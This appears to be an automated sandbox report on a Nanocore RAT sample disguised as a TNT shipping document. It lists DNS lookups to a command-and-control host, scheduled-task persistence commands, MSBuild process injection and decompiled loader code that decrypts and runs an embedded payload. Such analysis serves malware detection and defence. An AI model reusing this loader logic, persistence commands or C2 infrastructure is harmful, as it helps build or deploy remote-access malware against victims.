                                                      Jan 22, 2021 07:31:04.654083014 CET192.168.2.48.8.8.80x52f6Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:11.654519081 CET192.168.2.48.8.8.80x98ceStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:18.996299028 CET192.168.2.48.8.8.80xc52bStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:26.004311085 CET192.168.2.48.8.8.80xb97bStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:32.123198986 CET192.168.2.48.8.8.80xbbedStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:37.996712923 CET192.168.2.48.8.8.80x2d2aStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:45.238523006 CET192.168.2.48.8.8.80x9786Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:51.241583109 CET192.168.2.48.8.8.80x7d59Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:58.366811991 CET192.168.2.48.8.8.80x8811Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:05.423141956 CET192.168.2.48.8.8.80xb1a0Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:12.499536037 CET192.168.2.48.8.8.80xeb3eStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:19.415810108 CET192.168.2.48.8.8.80x5110Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:26.407856941 CET192.168.2.48.8.8.80x3361Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:33.422535896 CET192.168.2.48.8.8.80x1b93Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:40.510041952 CET192.168.2.48.8.8.80x6233Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:47.811078072 CET192.168.2.48.8.8.80x202Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:54.770771980 CET192.168.2.48.8.8.80xca19Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:02.690608978 CET192.168.2.48.8.8.80xed44Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:09.673223019 CET192.168.2.48.8.8.80x24d0Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:16.929156065 CET192.168.2.48.8.8.80x74a0Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:23.721820116 CET192.168.2.48.8.8.80x8bb5Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:30.837969065 CET192.168.2.48.8.8.80x41bdStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 22, 2021 07:30:35.336199999 CET8.8.8.8192.168.2.40x8081No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:42.758469105 CET8.8.8.8192.168.2.40x8b76No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:50.770622969 CET8.8.8.8192.168.2.40x47bfNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:57.780884027 CET8.8.8.8192.168.2.40x18bcNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:04.710472107 CET8.8.8.8192.168.2.40x52f6No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:11.713551998 CET8.8.8.8192.168.2.40x98ceNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:19.047084093 CET8.8.8.8192.168.2.40xc52bNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:26.060651064 CET8.8.8.8192.168.2.40xb97bNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:32.181315899 CET8.8.8.8192.168.2.40xbbedNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:38.216588974 CET8.8.8.8192.168.2.40x2d2aNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:45.294686079 CET8.8.8.8192.168.2.40x9786No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:51.462378979 CET8.8.8.8192.168.2.40x7d59No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:31:58.591681004 CET8.8.8.8192.168.2.40x8811No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:05.481987000 CET8.8.8.8192.168.2.40xb1a0No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:12.555836916 CET8.8.8.8192.168.2.40xeb3eNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:19.474915981 CET8.8.8.8192.168.2.40x5110No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:26.464147091 CET8.8.8.8192.168.2.40x3361No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:33.478782892 CET8.8.8.8192.168.2.40x1b93No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:40.569143057 CET8.8.8.8192.168.2.40x6233No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:47.867594004 CET8.8.8.8192.168.2.40x202No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:32:54.821542978 CET8.8.8.8192.168.2.40xca19No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:02.911175966 CET8.8.8.8192.168.2.40xed44No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:09.891906023 CET8.8.8.8192.168.2.40x24d0No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:16.988557100 CET8.8.8.8192.168.2.40x74a0No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:23.778325081 CET8.8.8.8192.168.2.40x8bb5No error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:33:30.894315004 CET8.8.8.8192.168.2.40x41bdNo error (0)mimi121.duckdns.org91.193.75.155A (IP address)IN (0x0001)

                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE PID: 5816 Parent PID: 5956

                                                      General

                                                      Start time:07:30:27
                                                      Start date:22/01/2021
                                                      Path:C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE'
                                                      Imagebase:0xa50000
                                                      File size:542720 bytes
                                                      MD5 hash:D40D97B41A353BC42B0E7EBE451886D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 1372 Parent PID: 5816

                                                      General

                                                      Start time:07:30:27
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: MSBuild.exe PID: 2204 Parent PID: 5816

                                                      General

                                                      Start time:07:30:29
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE'
                                                      Imagebase:0xad0000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.1047272619.00000000064F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.1047272619.00000000064F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: schtasks.exe PID: 7024 Parent PID: 2204

                                                      General

                                                      Start time:07:30:32
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp'
                                                      Imagebase:0xc40000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 5724 Parent PID: 7024

                                                      General

                                                      Start time:07:30:32
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: schtasks.exe PID: 6764 Parent PID: 2204

                                                      General

                                                      Start time:07:30:33
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7609.tmp'
                                                      Imagebase:0xc40000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6708 Parent PID: 6764

                                                      General

                                                      Start time:07:30:33
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: MSBuild.exe PID: 6908 Parent PID: 968

                                                      General

                                                      Start time:07:30:34
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 0
                                                      Imagebase:0x10000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6964 Parent PID: 6908

                                                      General

                                                      Start time:07:30:35
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: dhcpmon.exe PID: 6968 Parent PID: 968

                                                      General

                                                      Start time:07:30:35
                                                      Start date:22/01/2021
                                                      Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                      Imagebase:0xc70000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 0%, Metadefender, Browse
                                                      • Detection: 0%, ReversingLabs
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6796 Parent PID: 6968

                                                      General

                                                      Start time:07:30:35
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: dhcpmon.exe PID: 2480 Parent PID: 3424

                                                      General

                                                      Start time:07:30:41
                                                      Start date:22/01/2021
                                                      Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                      Imagebase:0x10000
                                                      File size:261728 bytes
                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6080 Parent PID: 2480

                                                      General

                                                      Start time:07:30:42
                                                      Start date:22/01/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE PID: 5816 Parent PID: 5956 TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECOMMON

                                                        Executed Functions

                                                        Function 00A51FD0, Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 41%
                                                        			E00A51FD0(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E00A52380(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}







                                                        0x00a51fd0
                                                        0x00a51fd3
                                                        0x00a51fe3
                                                        0x00a51fe9
                                                        0x00a51fec
                                                        0x00a51ff0
                                                        0x00a51ff4
                                                        0x00a51ff5
                                                        0x00a51ff9
                                                        0x00a51ffa
                                                        0x00a51fff
                                                        0x00a5200d
                                                        0x00a52012
                                                        0x00a52017
                                                        0x00a52024
                                                        0x00a52024
                                                        0x00a5202e

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000001,17D78400), ref: 00A51FDC
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A51FE3
                                                        • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400), ref: 00A5201D
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A52024
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Heap$Process$AllocAllocate
                                                        • String ID:
                                                        • API String ID: 1154092256-0
                                                        • Opcode ID: e6c0140b835c6c38aab558ca42024f84d0620658a83b99565864bcf04e90bbac
                                                        • Instruction ID: 47986a6432c943ba0cdce060f9fd5d3ec95a9dcab44374c3937add67fa0f36ed
                                                        • Opcode Fuzzy Hash: e6c0140b835c6c38aab558ca42024f84d0620658a83b99565864bcf04e90bbac
                                                        • Instruction Fuzzy Hash: 86F05471542218BFD700ABF4AD5DFABB3ACA705706F600445F505D7250D5B69E058A61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A52030, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 173librarymemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E00A52030(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				void* _v1008;
				void* _v8696;
				signed int _v8697;
				signed int _v8704;
				signed int _v8708;
				struct HWND__* _v8712;
				intOrPtr _v8716;
				intOrPtr _v8720;
				void* _v8724;
				intOrPtr _v8728;
				intOrPtr _v8732;
				intOrPtr _v8736;
				intOrPtr _v8740;
				struct HRSRC__* _v8744;
				long _v8748;
				void* __ebp;
				signed int _t82;
				struct HWND__* _t84;
				void* _t128;
				void* _t129;
				void* _t166;
				void* _t167;
				signed int _t168;
				void* _t169;
				void* _t170;
				void* _t171;

				_t167 = __esi;
				_t166 = __edi;
				_t129 = __ecx;
				_t128 = __ebx;
				E00A548F0(0x2228);
				_t82 =  *0xa6f360; // 0x51accb5
				_v8 = _t82 ^ _t168;
				_t84 = E00A51E50();
				_v8712 = _t84;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t84, 0); // executed
				E00A51FD0(_t129); // executed
				_v8720 = E00A51EC0(LoadLibraryA("User32.dll"), 0x23fdef72);
				_v8732 = E00A51EC0(LoadLibraryA("User32.dll"), 0x695c9378);
				_v8740 = E00A51EC0(_v8712, 0xe0baa99);
				_v8728 = E00A51EC0(_v8712, 0xb616c5d9);
				_v8736 = E00A51EC0(_v8712, 0x9347c911);
				_v8744 = FindResourceW(0, L"IEUCIZEO", 0xa);
				_v8716 = _v8740(0, _v8744);
				E00A54100( &_v8696, _v8716, 0x1e05);
				_t170 = _t169 + 0xc;
				_v8704 = 0;
				while(_v8704 < 0x1e05) {
					_v8697 =  *((intOrPtr*)(_t168 + _v8704 - 0x21f4));
					_v8697 = (_v8697 & 0x000000ff) >> 0x00000005 | (_v8697 & 0x000000ff) << 0x00000003;
					_v8697 = (_v8697 & 0x000000ff) + _v8704;
					_v8697 =  ~(_v8697 & 0x000000ff);
					_v8697 = (_v8697 & 0x000000ff) + _v8704;
					_v8697 =  ~(_v8697 & 0x000000ff);
					_v8697 = (_v8697 & 0x000000ff) >> 0x00000001 | (_v8697 & 0x000000ff) << 0x00000007;
					_v8697 = (_v8697 & 0x000000ff) - _v8704;
					_v8697 = (_v8697 & 0x000000ff) >> 0x00000001 | (_v8697 & 0x000000ff) << 0x00000007;
					_v8697 = (_v8697 & 0x000000ff) - _v8704;
					_v8697 =  !(_v8697 & 0x000000ff);
					_v8697 = _v8697 & 0x000000ff ^ _v8704;
					_v8697 = (_v8697 & 0x000000ff) >> 0x00000001 | (_v8697 & 0x000000ff) << 0x00000007;
					 *((char*)(_t168 + _v8704 - 0x21f4)) = _v8697;
					_v8704 = _v8704 + 1;
				}
				VirtualProtect( &_v8696, 0x1e05, 0x40,  &_v8748);
				_t152 =  &_v1008;
				GrayStringW(_v8732(0), 0, 0,  &_v8696,  &_v1008, 0, 0, 0, 0);
				while(1) {
					__eflags = 1;
					if(1 == 0) {
						break;
					}
					_t152 =  &_v8724;
					E00A53A3A("%d",  &_v8724);
					_t171 = _t170 + 8;
					_v8708 = _v8724;
					_v8708 = _v8708 - 1;
					__eflags = _v8708 - 5;
					if(__eflags > 0) {
						L14:
						E00A6945E(_t128, _t152, _t166, _t167, __eflags);
					} else {
						_t152 = _v8708;
						switch( *((intOrPtr*)(_v8708 * 4 +  &M00A52364))) {
							case 0:
								E00A511A0(_t128, _t152, _t166, _t167, __eflags);
								goto L15;
							case 1:
								__eax = E00A51400(__ebx, __edx, __edi, __esi, __eflags);
								goto L15;
							case 2:
								__eax = E00A515D0(__ebx, __edx, __edi, __esi, __eflags);
								goto L15;
							case 3:
								__eax = E00A51BC0(__ebx, __edx, __edi, __esi, __eflags);
								goto L15;
							case 4:
								__eax = E00A51930(__ebx, __edx, __edi, __esi, __eflags);
								goto L15;
							case 5:
								E00A6945E(__ebx, __edx, __edi, __esi, __eflags) = E00A53FE0(0);
								goto L14;
						}
					}
					L15:
					E00A5401F(_t128, _t152, _t166, __eflags, "cls");
					_t170 = _t171 + 4;
				}
				__eflags = _v8 ^ _t168;
				return E00A548DC(_t128, _v8 ^ _t168, _t152, _t166, _t167);
			}






























                                                        0x00a52030
                                                        0x00a52030
                                                        0x00a52030
                                                        0x00a52030
                                                        0x00a52038
                                                        0x00a5203d
                                                        0x00a52044
                                                        0x00a52047
                                                        0x00a5204c
                                                        0x00a52054
                                                        0x00a5205b
                                                        0x00a52061
                                                        0x00a5207c
                                                        0x00a52098
                                                        0x00a520af
                                                        0x00a520c6
                                                        0x00a520dd
                                                        0x00a520f2
                                                        0x00a52107
                                                        0x00a52120
                                                        0x00a52125
                                                        0x00a52128
                                                        0x00a52143
                                                        0x00a52160
                                                        0x00a5217c
                                                        0x00a5218f
                                                        0x00a5219e
                                                        0x00a521b1
                                                        0x00a521c0
                                                        0x00a521db
                                                        0x00a521ee
                                                        0x00a52209
                                                        0x00a5221c
                                                        0x00a5222b
                                                        0x00a5223e
                                                        0x00a52259
                                                        0x00a5226b
                                                        0x00a5213d
                                                        0x00a5213d
                                                        0x00a5228c
                                                        0x00a5229c
                                                        0x00a522b5
                                                        0x00a522bb
                                                        0x00a522c0
                                                        0x00a522c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a522c8
                                                        0x00a522d4
                                                        0x00a522d9
                                                        0x00a522e2
                                                        0x00a522f1
                                                        0x00a522f7
                                                        0x00a522fe
                                                        0x00a5233c
                                                        0x00a5233c
                                                        0x00a52300
                                                        0x00a52300
                                                        0x00a52306
                                                        0x00000000
                                                        0x00a5230d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52314
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5231b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52322
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52329
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52337
                                                        0x00000000
                                                        0x00000000
                                                        0x00a52306
                                                        0x00a52341
                                                        0x00a52346
                                                        0x00a5234b
                                                        0x00a5234b
                                                        0x00a52358
                                                        0x00a52362

                                                        APIs
                                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 00A52054
                                                        • ShowWindow.USER32(00000000), ref: 00A5205B
                                                          • Part of subcall function 00A51FD0: GetProcessHeap.KERNEL32(00000001,17D78400), ref: 00A51FDC
                                                          • Part of subcall function 00A51FD0: RtlAllocateHeap.NTDLL(00000000), ref: 00A51FE3
                                                          • Part of subcall function 00A51FD0: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400), ref: 00A5201D
                                                          • Part of subcall function 00A51FD0: HeapAlloc.KERNEL32(00000000), ref: 00A52024
                                                        • LoadLibraryA.KERNEL32(User32.dll,23FDEF72), ref: 00A52070
                                                        • LoadLibraryA.KERNEL32(User32.dll,695C9378), ref: 00A5208C
                                                        • FindResourceW.KERNELBASE(00000000,IEUCIZEO,0000000A), ref: 00A520EC
                                                        • _memmove.LIBCMT ref: 00A52120
                                                        • VirtualProtect.KERNELBASE(?,00001E05,00000040,?), ref: 00A5228C
                                                        • GrayStringW.USER32(00000000), ref: 00A522B5
                                                        • _wscanf.LIBCMT ref: 00A522D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Heap$LibraryLoadProcessWindow$AllocAllocateConsoleFindGrayProtectResourceShowStringVirtual_memmove_wscanf
                                                        • String ID: IEUCIZEO$User32.dll$User32.dll$cls
                                                        • API String ID: 511735878-1897359276
                                                        • Opcode ID: 6ba4c53b99bd1424923b337d7a35827d28716ea2964ec8ac55e5570189f2edd8
